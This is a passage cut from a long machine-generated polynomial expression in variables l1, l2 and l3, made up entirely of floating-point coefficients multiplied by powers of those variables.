1.09101578374229e+25*l1**2*l2**14*l3**4 + 4.85667631197246e+23*l1**2*l2**14*l3**3 - 3.82538985507515e+21*l1**2*l2**14*l3**2 + 3.71075341464308e+21*l1**2*l2**14*l3 + 2.93081775631923e+19*l1**2*l2**14 + 6.35428341657824e+33*l1**2*l2**13*l3**13 - 2.04498281675046e+34*l1**2*l2**13*l3**12 - 7.2114695412207e+31*l1**2*l2**13*l3**11 + 3.04807779182688e+32*l1**2*l2**13*l3**10 + 6.95635396457805e+29*l1**2*l2**13*l3**9 - 2.03802960152389e+30*l1**2*l2**13*l3**8 - 5.66524893098635e+27*l1**2*l2**13*l3**7 + 6.39179163822101e+27*l1**2*l2**13*l3**6 + 2.12576746795622e+25*l1**2*l2**13*l3**5 - 5.78762383874662e+24*l1**2*l2**13*l3**4 - 2.59937783753859e+22*l1**2*l2**13*l3**3 - 5.96511792404458e+21*l1**2*l2**13*l3**2 - 5.99994570927217e+18*l1**2*l2**13*l3 + 1.13517625551092e+19*l1**2*l2**13 - 9.66945352132346e+33*l1**2*l2**12*l3**14 + 1.95194448940137e+34*l1**2*l2**12*l3**13 + 1.21576566383126e+32*l1**2*l2**12*l3**12 - 3.18212597785078e+32*l1**2*l2**12*l3**11 - 8.63343183016594e+29*l1**2*l2**12*l3**10 + 2.46226723448971e+30*l1**2*l2**12*l3**9 + 5.76130171566501e+27*l1**2*l2**12*l3**8 - 9.80074713280776e+27*l1**2*l2**12*l3**7 - 2.63481475219563e+25*l1**2*l2**12*l3**6 + 1.62179800103885e+25*l1**2*l2**12*l3**5 + 4.54067701095449e+22*l1**2*l2**12*l3**4 - 3.95461940175939e+21*l1**2*l2**12*l3**3 + 
4.1498323557974e+19*l1**2*l2**12*l3**2 - 1.21729299922899e+19*l1**2*l2**12*l3 - 1.74331418361127e+17*l1**2*l2**12 + 1.1142693634244e+34*l1**2*l2**11*l3**15 - 1.73365932433295e+34*l1**2*l2**11*l3**14 - 1.71647957433548e+32*l1**2*l2**11*l3**13 + 3.0366712220204e+32*l1**2*l2**11*l3**12 + 1.26574940289999e+30*l1**2*l2**11*l3**11 - 2.62246499895878e+30*l1**2*l2**11*l3**10 - 6.89898468444677e+27*l1**2*l2**11*l3**9 + 1.24114967200664e+28*l1**2*l2**11*l3**8 + 3.20493303308775e+25*l1**2*l2**11*l3**7 - 2.84165235123639e+25*l1**2*l2**11*l3**6 - 9.30491643209743e+22*l1**2*l2**11*l3**5 + 2.13030174670779e+22*l1**2*l2**11*l3**4 + 1.08707683596553e+20*l1**2*l2**11*l3**3 + 2.57702244448675e+19*l1**2*l2**11*l3**2 + 7.80807569281499e+15*l1**2*l2**11*l3 - 5.82774355857546e+16*l1**2*l2**11 - 9.99618567526636e+33*l1**2*l2**10*l3**16 + 1.42413079671561e+34*l1**2*l2**10*l3**15 + 1.88745381646644e+32*l1**2*l2**10*l3**14 - 2.66188105639092e+32*l1**2*l2**10*l3**13 - 1.64420419499421e+30*l1**2*l2**10*l3**12 + 2.50786394846244e+30*l1**2*l2**10*l3**11 + 8.92570857107605e+27*l1**2*l2**10*l3**10 - 1.35705300931384e+28*l1**2*l2**10*l3**9 - 3.56437234205628e+25*l1**2*l2**10*l3**8 + 3.95160504524226e+25*l1**2*l2**10*l3**7 + 9.77840871015364e+22*l1**2*l2**10*l3**6 - 5.44218769577075e+22*l1**2*l2**10*l3**5 - 6.443454834485e+19*l1**2*l2**10*l3**4 + 1.76721350524239e+19*l1**2*l2**10*l3**3 - 3.32130466295508e+17*l1**2*l2**10*l3**2 + 4.28923603447365e+16*l1**2*l2**10*l3 + 478100897521338.0*l1**2*l2**10 + 7.0231941439036e+33*l1**2*l2**9*l3**17 - 1.06623907552651e+34*l1**2*l2**9*l3**16 - 1.61318689711086e+32*l1**2*l2**9*l3**15 + 2.12864109810417e+32*l1**2*l2**9*l3**14 + 1.70184944339071e+30*l1**2*l2**9*l3**13 - 2.16439434375123e+30*l1**2*l2**9*l3**12 - 1.06910324014022e+28*l1**2*l2**9*l3**11 + 1.30314217227845e+28*l1**2*l2**9*l3**10 + 4.46630732985361e+25*l1**2*l2**9*l3**9 - 4.46315903909503e+25*l1**2*l2**9*l3**8 - 1.43266716179746e+23*l1**2*l2**9*l3**7 + 7.83135628548999e+22*l1**2*l2**9*l3**6 + 
2.99157452346265e+20*l1**2*l2**9*l3**5 - 3.26663812244005e+19*l1**2*l2**9*l3**4 - 3.55188716422993e+17*l1**2*l2**9*l3**3 - 1.34156075155703e+17*l1**2*l2**9*l3**2 + 201495160840197.0*l1**2*l2**9*l3 + 137483053563278.0*l1**2*l2**9 - 3.79355984876739e+33*l1**2*l2**8*l3**18 + 7.13054877814843e+33*l1**2*l2**8*l3**17 + 1.06824578921848e+32*l1**2*l2**8*l3**16 - 1.52580825254639e+32*l1**2*l2**8*l3**15 - 1.3621052022533e+30*l1**2*l2**8*l3**14 + 1.67189972843809e+30*l1**2*l2**8*l3**13 + 1.0164660863932e+28*l1**2*l2**8*l3**12 - 1.11164579512551e+28*l1**2*l2**8*l3**11 - 4.62473487470449e+25*l1**2*l2**8*l3**10 + 4.39278253533684e+25*l1**2*l2**8*l3**9 + 1.39776931451933e+23*l1**2*l2**8*l3**8 - 9.98886203718664e+22*l1**2*l2**8*l3**7 - 1.94636829672152e+20*l1**2*l2**8*l3**6 + 1.11898661324462e+20*l1**2*l2**8*l3**5 - 1.99067630253218e+17*l1**2*l2**8*l3**4 - 1.49504669729217e+16*l1**2*l2**8*l3**3 + 794408598076611.0*l1**2*l2**8*l3**2 - 44571225082984.2*l1**2*l2**8*l3 - 412061157667.207*l1**2*l2**8 + 1.46400759620317e+33*l1**2*l2**7*l3**19 - 4.16645811979149e+33*l1**2*l2**7*l3**18 - 5.32746361264455e+31*l1**2*l2**7*l3**17 + 9.57000500155429e+31*l1**2*l2**7*l3**16 + 8.28707996321487e+29*l1**2*l2**7*l3**15 - 1.13043533264374e+30*l1**2*l2**7*l3**14 - 7.49397491070353e+27*l1**2*l2**7*l3**13 + 8.27788280087921e+27*l1**2*l2**7*l3**12 + 4.12485181443835e+25*l1**2*l2**7*l3**11 - 3.67150810838279e+25*l1**2*l2**7*l3**10 - 1.59655709632478e+23*l1**2*l2**7*l3**9 + 9.63249541650319e+22*l1**2*l2**7*l3**8 + 4.22921512665234e+20*l1**2*l2**7*l3**7 - 1.12048482480152e+20*l1**2*l2**7*l3**6 - 7.69728680977933e+17*l1**2*l2**7*l3**5 - 6.52937882339492e+16*l1**2*l2**7*l3**4 + 1.04249970721556e+15*l1**2*l2**7*l3**3 + 251493475112860.0*l1**2*l2**7*l3**2 - 457845730741.338*l1**2*l2**7*l3 - 82412231533.4337*l1**2*l2**7 - 3.03562524783538e+32*l1**2*l2**6*l3**20 + 2.07580796396794e+33*l1**2*l2**6*l3**19 + 1.84900472260209e+31*l1**2*l2**6*l3**18 - 5.10118163451969e+31*l1**2*l2**6*l3**17 - 
3.6538419435546e+29*l1**2*l2**6*l3**16 + 6.48225461627784e+29*l1**2*l2**6*l3**15 + 3.9551336744309e+27*l1**2*l2**6*l3**14 - 5.25624701213462e+27*l1**2*l2**6*l3**13 - 2.50149849062936e+25*l1**2*l2**6*l3**12 + 2.64736912731008e+25*l1**2*l2**6*l3**11 + 1.02643850290422e+23*l1**2*l2**6*l3**10 - 8.55207443033955e+22*l1**2*l2**6*l3**9 - 2.14120669787009e+20*l1**2*l2**6*l3**8 + 1.58361169077086e+20*l1**2*l2**6*l3**7 - 6.21365029504296e+16*l1**2*l2**6*l3**6 - 1.44610802535687e+17*l1**2*l2**6*l3**5 + 830855924214532.0*l1**2*l2**6*l3**4 + 82293861397653.2*l1**2*l2**6*l3**3 - 686768596112.04*l1**2*l2**6*l3**2 - 20603057883.33*l1**2*l2**6*l3 - 322082542.593271*l1**2*l2**6 - 5.4082659436467e+31*l1**2*l2**5*l3**21 - 8.57398941638932e+32*l1**2*l2**5*l3**20 - 3.31674345069939e+30*l1**2*l2**5*l3**19 + 2.23011422602626e+31*l1**2*l2**5*l3**18 + 1.04912570482353e+29*l1**2*l2**5*l3**17 - 3.01352519324008e+29*l1**2*l2**5*l3**16 - 1.39384450801415e+27*l1**2*l2**5*l3**15 + 2.69667195172543e+27*l1**2*l2**5*l3**14 + 1.07362057569081e+25*l1**2*l2**5*l3**13 - 1.51853188037287e+25*l1**2*l2**5*l3**12 - 6.07269132761096e+22*l1**2*l2**5*l3**11 + 5.66268939106795e+22*l1**2*l2**5*l3**10 + 2.48968806220204e+20*l1**2*l2**5*l3**9 - 1.1261861215504e+20*l1**2*l2**5*l3**8 - 6.82152098836762e+17*l1**2*l2**5*l3**7 + 3.24112060244633e+16*l1**2*l2**5*l3**6 + 1.32560702518997e+15*l1**2*l2**5*l3**5 + 170151768372105.0*l1**2*l2**5*l3**4 - 1098829753779.11*l1**2*l2**5*l3**3 - 123618347300.197*l1**2*l2**5*l3**2 - 276070750.794363*l1**2*l2**5*l3 - 207053063.095747*l1**2*l2**5 + 7.2956568679789e+31*l1**2*l2**4*l3**22 + 2.82601329776077e+32*l1**2*l2**4*l3**21 - 4.20678607555961e+29*l1**2*l2**4*l3**20 - 7.59939845585697e+30*l1**2*l2**4*l3**19 - 1.25048881718997e+28*l1**2*l2**4*l3**18 + 1.0609740977117e+29*l1**2*l2**4*l3**17 + 1.73660272440547e+26*l1**2*l2**4*l3**16 - 1.04524878485829e+27*l1**2*l2**4*l3**15 - 8.26342791836868e+23*l1**2*l2**4*l3**14 + 6.70473887269203e+24*l1**2*l2**4*l3**13 + 
2.26393953688109e+20*l1**2*l2**4*l3**12 - 3.2085103661202e+22*l1**2*l2**4*l3**11 + 2.68252804096386e+19*l1**2*l2**4*l3**10 + 9.94052300908343e+19*l1**2*l2**4*l3**9 - 2.45245835924351e+17*l1**2*l2**4*l3**8 - 1.63496872867015e+17*l1**2*l2**4*l3**7 + 806296104701692.0*l1**2*l2**4*l3**6 + 179095097385366.0*l1**2*l2**4*l3**5 - 915691461482.633*l1**2*l2**4*l3**4 - 103015289416.78*l1**2*l2**4*l3**3 + 0.000177734375*l1**2*l2**4*l3**2 + 207053063.095734*l1**2*l2**4*l3 + 3639604.62473035*l1**2*l2**4 - 2.97318334964337e+31*l1**2*l2**3*l3**23 - 7.02039763528611e+31*l1**2*l2**3*l3**22 + 3.92962547683594e+29*l1**2*l2**3*l3**21 + 1.84632863526513e+30*l1**2*l2**3*l3**20 - 1.53299201180638e+27*l1**2*l2**3*l3**19 - 2.42648407803506e+28*l1**2*l2**3*l3**18 + 7.17216162935787e+25*l1**2*l2**3*l3**17 + 2.51687703237737e+26*l1**2*l2**3*l3**16 - 1.30783804828217e+24*l1**2*l2**3*l3**15 - 1.73406793844661e+24*l1**2*l2**3*l3**14 + 1.09288356497842e+22*l1**2*l2**3*l3**13 + 1.02924544870219e+22*l1**2*l2**3*l3**12 - 3.02099942457178e+19*l1**2*l2**3*l3**11 - 3.70880766483693e+19*l1**2*l2**3*l3**10 - 9.10801731145172e+16*l1**2*l2**3*l3**9 + 3.42312179125649e+16*l1**2*l2**3*l3**8 + 758076684624316.0*l1**2*l2**3*l3**7 + 65279723274669.0*l1**2*l2**3*l3**6 - 1098829753779.14*l1**2*l2**3*l3**5 - 103015289416.78*l1**2*l2**3*l3**4 - 368094334.392332*l1**2*l2**3*l3**3 - 331284900.953246*l1**2*l2**3*l3**2 + 5823367.39956877*l1**2*l2**3*l3 + 2620515.32980597*l1**2*l2**3 + 6.09275433449839e+30*l1**2*l2**2*l3**24 + 1.18301400648968e+31*l1**2*l2**2*l3**23 - 4.66981359106039e+28*l1**2*l2**2*l3**22 - 2.55185069769373e+29*l1**2*l2**2*l3**21 - 4.01476414329497e+26*l1**2*l2**2*l3**20 + 1.72416475724787e+27*l1**2*l2**2*l3**19 - 4.65108495825635e+25*l1**2*l2**2*l3**18 - 1.18273750785491e+25*l1**2*l2**2*l3**17 + 1.18005232078041e+24*l1**2*l2**2*l3**16 + 6.73097432056872e+22*l1**2*l2**2*l3**15 - 1.47725141278876e+22*l1**2*l2**2*l3**14 - 1.90221497842973e+21*l1**2*l2**2*l3**13 + 9.94387388750169e+19*l1**2*l2**2*l3**12 + 
1.7271816521224e+19*l1**2*l2**2*l3**11 - 3.63593845211351e+17*l1**2*l2**2*l3**10 - 6.11729090441074e+16*l1**2*l2**2*l3**9 + 710688235883898.0*l1**2*l2**2*l3**8 + 133952579508308.0*l1**2*l2**2*l3**7 - 686768596112.062*l1**2*l2**2*l3**6 - 123618347300.153*l1**2*l2**2*l3**5 - 276070750.794262*l1**2*l2**2*l3**4 + 165642450.476572*l1**2*l2**2*l3**3 + 2183762.77483812*l1**2*l2**2*l3**2 - 982693.248677253*l1**2*l2**2*l3 - 14330.9432098765*l1**2*l2**2 - 4.03827959204529e+29*l1**2*l2*l3**25 - 1.06307710260593e+30*l1**2*l2*l3**24 - 2.62204372793147e+28*l1**2*l2*l3**23 - 1.43079913527275e+25*l1**2*l2*l3**22 + 9.52741612793102e+26*l1**2*l2*l3**21 + 8.67049758401261e+26*l1**2*l2*l3**20 + 2.93553746085458e+24*l1**2*l2*l3**19 - 1.60086817456073e+25*l1**2*l2*l3**18 - 2.80360204389063e+23*l1**2*l2*l3**17 + 1.77549591604874e+23*l1**2*l2*l3**16 + 4.48750867433106e+21*l1**2*l2*l3**15 - 8.56823546486594e+20*l1**2*l2*l3**14 - 3.0964431840477e+19*l1**2*l2*l3**13 + 1.75521951244602e+18*l1**2*l2*l3**12 + 8.06698310787038e+16*l1**2*l2*l3**11 - 5.05357783262206e+15*l1**2*l2*l3**10 + 62407486237002.7*l1**2*l2*l3**9 + 8372036219274.15*l1**2*l2*l3**8 - 457845730741.273*l1**2*l2*l3**7 - 20603057883.3733*l1**2*l2*l3**6 - 7.6171875e-5*l1**2*l2*l3**5 - 165642450.476648*l1**2*l2*l3**4 + 1455841.84989231*l1**2*l2*l3**3 + 1965386.49735449*l1**2*l2*l3**2 - 28661.8864197531*l1**2*l2*l3 - 12897.8488888889*l1**2*l2 - 5.55263443906238e+28*l1**2*l3**26 + 1.36291936231527e+28*l1**2*l3**25 + 8.01138361624685e+27*l1**2*l3**24 + 4.70804217777474e+27*l1**2*l3**23 - 2.44889814558781e+26*l1**2*l3**22 - 2.31360016203148e+26*l1**2*l3**21 - 1.63012058090929e+23*l1**2*l3**20 + 4.11552465567385e+24*l1**2*l3**19 + 8.06262066955987e+22*l1**2*l3**18 - 4.52339913426331e+22*l1**2*l3**17 - 1.76219970217265e+21*l1**2*l3**16 + 2.14799668425736e+20*l1**2*l3**15 + 1.80034012788831e+19*l1**2*l3**14 + 7.61685982851856e+16*l1**2*l3**13 - 9.81184205465821e+16*l1**2*l3**12 - 5.5712011631729e+15*l1**2*l3**11 + 
308205730020471.0*l1**2*l3**10 + 39698501493548.7*l1**2*l3**9 - 412061157667.18*l1**2*l3**8 - 82412231533.4351*l1**2*l3**7 - 46011791.7990606*l1**2*l3**6 + 41410612.6191494*l1**2*l3**5 + 1455841.84989214*l1**2*l3**4 - 327564.416225746*l1**2*l3**3 - 14330.9432098765*l1**2*l3**2 - 6.3058299322923e-12*l1**2*l3 + 3.02870969403397e+28*l1*l2**27 - 1.1761489311832e+30*l1*l2**26*l3 + 1.13576613526274e+28*l1*l2**26 + 1.14384269444684e+31*l1*l2**25*l3**2 - 5.13366293138761e+29*l1*l2**25*l3 + 3.49099496157695e+27*l1*l2**25 - 6.17705342098234e+31*l1*l2**24*l3**3 + 5.53118107872959e+30*l1*l2**24*l3**2 + 1.90510543944831e+28*l1*l2**24*l3 + 1.55272603829623e+27*l1*l2**24 + 2.27405619527053e+32*l1*l2**23*l3**4 - 3.32461463114112e+31*l1*l2**23*l3**3 - 3.31193926135492e+29*l1*l2**23*l3**2 + 6.71192152479485e+27*l1*l2**23*l3 - 2.29134546844929e+26*l1*l2**23 - 6.17468093172202e+32*l1*l2**22*l3**5 + 1.38161407290172e+32*l1*l2**22*l3**4 + 1.90809679026743e+30*l1*l2**22*l3**3 - 1.54441076611256e+29*l1*l2**22*l3**2 + 3.40684808159715e+26*l1*l2**22*l3 - 9.67714732176006e+25*l1*l2**22 + 1.27366328763212e+33*l1*l2**21*l3**6 - 4.35021145128338e+32*l1*l2**21*l3**5 - 6.74890610674855e+30*l1*l2**21*l3**4 + 1.02530980468782e+30*l1*l2**21*l3**3 + 4.20260860102963e+27*l1*l2**21*l3**2 + 2.18353281793462e+26*l1*l2**21*l3 + 4.71390426057806e+24*l1*l2**21 - 1.96202337904268e+33*l1*l2**20*l3**7 + 1.09055128541794e+33*l1*l2**20*l3**6 + 1.67315493849243e+31*l1*l2**20*l3**5 - 4.21230545320567e+30*l1*l2**20*l3**4 - 2.94353299736349e+28*l1*l2**20*l3**3 + 1.80754054553283e+27*l1*l2**20*l3**2 - 6.89090485316596e+24*l1*l2**20*l3 + 2.04740995449086e+24*l1*l2**20 + 1.99472839588875e+33*l1*l2**19*l3**8 - 2.23882220582993e+33*l1*l2**19*l3**7 - 2.98775194819747e+31*l1*l2**19*l3**6 + 1.25778333869539e+31*l1*l2**19*l3**5 + 1.00364998113496e+29*l1*l2**19*l3**4 - 1.58484172967883e+28*l1*l2**19*l3**3 - 5.09793386632737e+25*l1*l2**19*l3**2 - 5.07710552262958e+24*l1*l2**19*l3 - 6.90385873561201e+22*l1*l2**19 - 
3.39821227670615e+32*l1*l2**18*l3**9 + 3.82278891645461e+33*l1*l2**18*l3**8 + 3.56531213696031e+31*l1*l2**18*l3**7 - 2.92033160052343e+31*l1*l2**18*l3**6 - 2.21184114523101e+29*l1*l2**18*l3**5 + 6.55582538948662e+28*l1*l2**18*l3**4 + 3.380214373628e+26*l1*l2**18*l3**3 - 1.78442759330729e+25*l1*l2**18*l3**2 + 9.66214371349009e+22*l1*l2**18*l3 - 2.97766314539911e+22*l1*l2**18 - 3.8124388058602e+33*l1*l2**17*l3**10 - 5.45752891639008e+33*l1*l2**17*l3**9 - 1.48339090655809e+31*l1*l2**17*l3**8 + 5.45168906677976e+31*l1*l2**17*l3**7 + 3.16441355770776e+29*l1*l2**17*l3**6 - 1.84797628030735e+29*l1*l2**17*l3**5 - 9.9067031388746e+26*l1*l2**17*l3**4 + 1.75090777605903e+26*l1*l2**17*l3**3 + 3.35603867416481e+23*l1*l2**17*l3**2 + 7.37239933694304e+22*l1*l2**17*l3 + 6.22621492727903e+20*l1*l2**17 + 1.02711218455918e+34*l1*l2**16*l3**11 + 6.47409412422473e+33*l1*l2**16*l3**10 - 5.09515788547786e+31*l1*l2**16*l3**9 - 8.30568499283749e+31*l1*l2**16*l3**8 - 2.02891619533236e+29*l1*l2**16*l3**7 + 3.92167545490683e+29*l1*l2**16*l3**6 + 1.76388851485741e+27*l1*l2**16*l3**5 - 6.68681466449557e+26*l1*l2**16*l3**4 - 2.3460535515454e+24*l1*l2**16*l3**3 + 6.77733549813534e+22*l1*l2**16*l3**2 - 4.1053937645195e+20*l1*l2**16*l3 + 2.60897303177589e+20*l1*l2**16 - 1.74556957376925e+34*l1*l2**15*l3**12 - 6.21746549442984e+33*l1*l2**15*l3**11 + 1.62659181283752e+32*l1*l2**15*l3**10 + 1.03191687382948e+32*l1*l2**15*l3**9 - 3.35425959529102e+29*l1*l2**15*l3**8 - 6.52745659308974e+29*l1*l2**15*l3**7 - 1.60238589095781e+27*l1*l2**15*l3**6 + 1.68677809367542e+27*l1*l2**15*l3**5 + 5.65520340672336e+24*l1*l2**15*l3**4 - 1.13517673595452e+24*l1*l2**15*l3**3 - 1.92415021795335e+21*l1*l2**15*l3**2 - 4.61180720360064e+20*l1*l2**15*l3 - 4.81942394134603e+18*l1*l2**15 + 2.29212194381049e+34*l1*l2**14*l3**13 + 4.46513962651062e+33*l1*l2**14*l3**12 - 2.93206463775978e+32*l1*l2**14*l3**11 - 1.02203820640932e+32*l1*l2**14*l3**10 + 1.36192306211528e+30*l1*l2**14*l3**9 + 8.61706149331456e+29*l1*l2**14*l3**8 - 
9.98068019105674e+26*l1*l2**14*l3**7 - 3.12761141745372e+27*l1*l2**14*l3**6 - 7.24944182622646e+24*l1*l2**14*l3**5 + 4.01407894423084e+24*l1*l2**14*l3**4 + 1.16112376332776e+22*l1*l2**14*l3**3 - 2.51898011942653e+20*l1*l2**14*l3**2 + 1.86531911712146e+18*l1*l2**14*l3 - 1.77145273150263e+18*l1*l2**14 - 2.46206334952769e+34*l1*l2**13*l3**14 - 1.66248449508766e+33*l1*l2**13*l3**13 + 3.95569986802679e+32*l1*l2**13*l3**12 + 7.46579936916071e+31*l1*l2**13*l3**11 - 2.63751024681537e+30*l1*l2**13*l3**10 - 8.87536320843622e+29*l1*l2**13*l3**9 + 6.85376180998034e+27*l1*l2**13*l3**8 + 4.42899665255858e+27*l1*l2**13*l3**7 - 8.64956412675681e+22*l1*l2**13*l3**6 - 8.92437150834772e+24*l1*l2**13*l3**5 - 1.90553269647309e+22*l1*l2**13*l3**4 + 5.15226933842882e+21*l1*l2**13*l3**3 - 6.79110078499028e+16*l1*l2**13*l3**2 + 2.09681313081854e+18*l1*l2**13*l3 + 3.38537190709897e+16*l1*l2**13 + 2.2073917709801e+34*l1*l2**12*l3**15 - 1.24475652513483e+33*l1*l2**12*l3**14 - 4.285530791702e+32*l1*l2**12*l3**13 - 2.7844060201728e+31*l1*l2**12*l3**12 + 3.67484345842044e+30*l1*l2**12*l3**11 + 6.61343770198766e+29*l1*l2**12*l3**10 - 1.46964139417533e+28*l1*l2**12*l3**9 - 4.74693277720576e+27*l1*l2**12*l3**8 + 2.09554816079517e+25*l1*l2**12*l3**7 + 1.39301449312905e+25*l1*l2**12*l3**6 + 1.16910545324638e+22*l1*l2**12*l3**5 - 1.47675656490139e+22*l1*l2**12*l3**4 - 3.0607613244704e+19*l1*l2**12*l3**3 - 1.45635535803023e+18*l1*l2**12*l3**2 - 1.94559304883198e+16*l1*l2**12*l3 + 1.07969371068442e+16*l1*l2**12 - 1.65702120758457e+34*l1*l2**11*l3**16 + 3.30735098588513e+33*l1*l2**11*l3**15 + 3.81844819215757e+32*l1*l2**11*l3**14 - 2.10158093833341e+31*l1*l2**11*l3**13 - 4.02172064397789e+30*l1*l2**11*l3**12 - 2.44654113133421e+29*l1*l2**11*l3**11 + 2.13962492141293e+28*l1*l2**11*l3**10 + 3.57113332070403e+27*l1*l2**11*l3**9 - 5.25799231078325e+25*l1*l2**11*l3**8 - 1.57612417358227e+25*l1*l2**11*l3**7 + 3.75464463429556e+22*l1*l2**11*l3**6 + 2.69209505708023e+22*l1*l2**11*l3**5 + 
1.85444509395168e+19*l1*l2**11*l3**4 - 1.13547281977911e+19*l1*l2**11*l3**3 + 6.55662602016971e+16*l1*l2**11*l3**2 - 1.30083741106197e+16*l1*l2**11*l3 - 105656466651053.0*l1*l2**11 + 1.03081326780529e+34*l1*l2**10*l3**17 - 4.05396729869053e+33*l1*l2**10*l3**16 - 2.80945898803335e+32*l1*l2**10*l3**15 + 5.45392938924899e+31*l1*l2**10*l3**14 + 3.55660988035402e+30*l1*l2**10*l3**13 - 1.93711054371437e+29*l1*l2**10*l3**12 - 2.37549481265351e+28*l1*l2**10*l3**11 - 1.21414063414674e+27*l1*l2**10*l3**10 + 8.09205073538838e+25*l1*l2**10*l3**9 + 1.17926947736505e+25*l1*l2**10*l3**8 - 1.16667917133562e+23*l1*l2**10*l3**7 - 3.12144503939018e+22*l1*l2**10*l3**6 + 1.48286072946211e+19*l1*l2**10*l3**5 + 2.23894350177141e+19*l1*l2**10*l3**4 + 4.46855729322784e+16*l1*l2**10*l3**3 + 2.86536972636656e+16*l1*l2**10*l3**2 + 6778571738983.5*l1*l2**10*l3 - 29886114956988.8*l1*l2**10 - 5.15928581539916e+33*l1*l2**9*l3**18 + 3.63908555867267e+33*l1*l2**9*l3**17 + 1.68780435228588e+32*l1*l2**9*l3**16 - 6.47414105697156e+31*l1*l2**9*l3**15 - 2.55403685952053e+30*l1*l2**9*l3**14 + 4.81992248555141e+29*l1*l2**9*l3**13 + 2.08745259549674e+28*l1*l2**9*l3**12 - 1.26558519128196e+27*l1*l2**9*l3**11 - 9.19763640102285e+25*l1*l2**9*l3**10 - 3.18486299495606e+24*l1*l2**9*l3**9 + 2.00165549060606e+23*l1*l2**9*l3**8 + 2.22167683184597e+22*l1*l2**9*l3**7 - 1.59669404657202e+20*l1*l2**9*l3**6 - 3.17123175456696e+19*l1*l2**9*l3**5 + 5.57555245889794e+16*l1*l2**9*l3**4 - 6.07494077509157e+15*l1*l2**9*l3**3 - 155737878057397.0*l1*l2**9*l3**2 + 23895042443315.4*l1*l2**9*l3 + 96656320934.3063*l1*l2**9 + 1.92676415035463e+33*l1*l2**8*l3**19 - 2.61182597690838e+33*l1*l2**8*l3**18 - 8.01612998560212e+31*l1*l2**8*l3**17 + 5.54896466022948e+31*l1*l2**8*l3**16 + 1.47017170795331e+30*l1*l2**8*l3**15 - 5.48694978133746e+29*l1*l2**8*l3**14 - 1.45785007246402e+28*l1*l2**8*l3**13 + 2.80193188533733e+27*l1*l2**8*l3**12 + 8.00746107046719e+25*l1*l2**8*l3**11 - 5.91918837521325e+24*l1*l2**8*l3**10 - 
2.31243170320518e+23*l1*l2**8*l3**9 - 2.17092653006094e+19*l1*l2**8*l3**8 + 2.70679683554814e+20*l1*l2**8*l3**7 + 1.02689225436835e+19*l1*l2**8*l3**6 + 7.45890814834328e+15*l1*l2**8*l3**5 + 2.11438502304185e+16*l1*l2**8*l3**4 - 202295355460913.0*l1*l2**8*l3**3 - 62956465911919.5*l1*l2**8*l3**2 + 91569146148.2417*l1*l2**8*l3 + 20603057883.3652*l1*l2**8 - 4.04342839852519e+32*l1*l2**7*l3**20 + 1.53829073972895e+33*l1*l2**7*l3**19 + 2.77053134740361e+31*l1*l2**7*l3**18 - 3.73716042852615e+31*l1*l2**7*l3**17 - 6.53940173229135e+29*l1*l2**7*l3**16 + 4.43362032690497e+29*l1*l2**7*l3**15 + 7.97362244584883e+27*l1*l2**7*l3**14 - 2.9977862064967e+27*l1*l2**7*l3**13 - 5.41576415155946e+25*l1*l2**7*l3**12 + 1.09803335608511e+25*l1*l2**7*l3**11 + 2.02668179352713e+23*l1*l2**7*l3**10 - 2.13862482452955e+22*l1*l2**7*l3**9 - 3.5951177783888e+20*l1*l2**7*l3**8 + 2.027794065869e+19*l1*l2**7*l3**7 + 2.38061410489238e+17*l1*l2**7*l3**6 - 7.71264507508605e+15*l1*l2**7*l3**5 - 116289822091794.0*l1*l2**7*l3**4 + 221592356529.737*l1*l2**7*l3**3 + 91569146148.3283*l1*l2**7*l3**2 - 0.0108333333333333*l1*l2**7*l3 + 184047167.196191*l1*l2**7 - 7.31281955624508e+31*l1*l2**6*l3**21 - 7.45982555301927e+32*l1*l2**6*l3**20 - 5.06533756320803e+30*l1*l2**6*l3**19 + 2.02013812604013e+31*l1*l2**6*l3**18 + 2.04413085565359e+29*l1*l2**6*l3**17 - 2.74999072005565e+29*l1*l2**6*l3**16 - 3.24847028307434e+27*l1*l2**6*l3**15 + 2.24978553355329e+27*l1*l2**6*l3**14 + 2.74628423626918e+25*l1*l2**6*l3**13 - 1.08174764560133e+25*l1*l2**6*l3**12 - 1.28194073197024e+23*l1*l2**6*l3**11 + 3.20745226323859e+22*l1*l2**6*l3**10 + 2.8473339060837e+20*l1*l2**6*l3**9 - 5.73334903456262e+19*l1*l2**6*l3**8 - 1.65830327011815e+17*l1*l2**6*l3**7 + 5.720168676616e+16*l1*l2**6*l3**6 - 224916241854283.0*l1*l2**6*l3**5 - 41534717322722.7*l1*l2**6*l3**4 + 289968962802.805*l1*l2**6*l3**3 + 20603057883.4167*l1*l2**6*l3**2 + 5.078125e-5*l1*l2**6*l3 + 96624762.7780195*l1*l2**6 + 1.14192451164062e+32*l1*l2**5*l3**22 + 
2.94794915004258e+32*l1*l2**5*l3**21 - 1.05768179093139e+30*l1*l2**5*l3**20 - 8.72687221489122e+30*l1*l2**5*l3**19 - 3.07162276237164e+28*l1*l2**5*l3**18 + 1.32511733569495e+29*l1*l2**5*l3**17 + 8.67627555633239e+26*l1*l2**5*l3**16 - 1.25947047365137e+27*l1*l2**5*l3**15 - 9.8135883425604e+24*l1*l2**5*l3**14 + 7.32888433411822e+24*l1*l2**5*l3**13 + 5.87787482245463e+22*l1*l2**5*l3**12 - 2.77909930559705e+22*l1*l2**5*l3**11 - 1.78468005506555e+20*l1*l2**5*l3**10 + 6.324868515376e+19*l1*l2**5*l3**9 + 2.46335468462577e+17*l1*l2**5*l3**8 - 5.82903618065498e+16*l1*l2**5*l3**7 - 237196151610734.0*l1*l2**5*l3**6 - 18219046561516.6*l1*l2**5*l3**5 + 183138292296.44*l1*l2**5*l3**4 + 41206115766.6817*l1*l2**5*l3**3 - 276070750.794474*l1*l2**5*l3**2 - 165642450.476547*l1*l2**5*l3 - 2911683.69978424*l1*l2**5 - 5.80351255871815e+31*l1*l2**4*l3**23 - 9.2689874298793e+31*l1*l2**4*l3**22 + 1.22575327770598e+30*l1*l2**4*l3**21 + 2.9416578993085e+30*l1*l2**4*l3**20 - 7.65220308657666e+27*l1*l2**4*l3**19 - 4.85974159661008e+28*l1*l2**4*l3**18 - 7.00306381700995e+25*l1*l2**4*l3**17 + 5.24240621123341e+26*l1*l2**4*l3**16 + 1.79236247322616e+24*l1*l2**4*l3**15 - 3.57527852971251e+24*l1*l2**4*l3**14 - 1.39614777629033e+22*l1*l2**4*l3**13 + 1.69270977168547e+22*l1*l2**4*l3**12 + 4.50291099466524e+19*l1*l2**4*l3**11 - 5.15053885950467e+19*l1*l2**4*l3**10 - 2.50904860916821e+16*l1*l2**4*l3**9 + 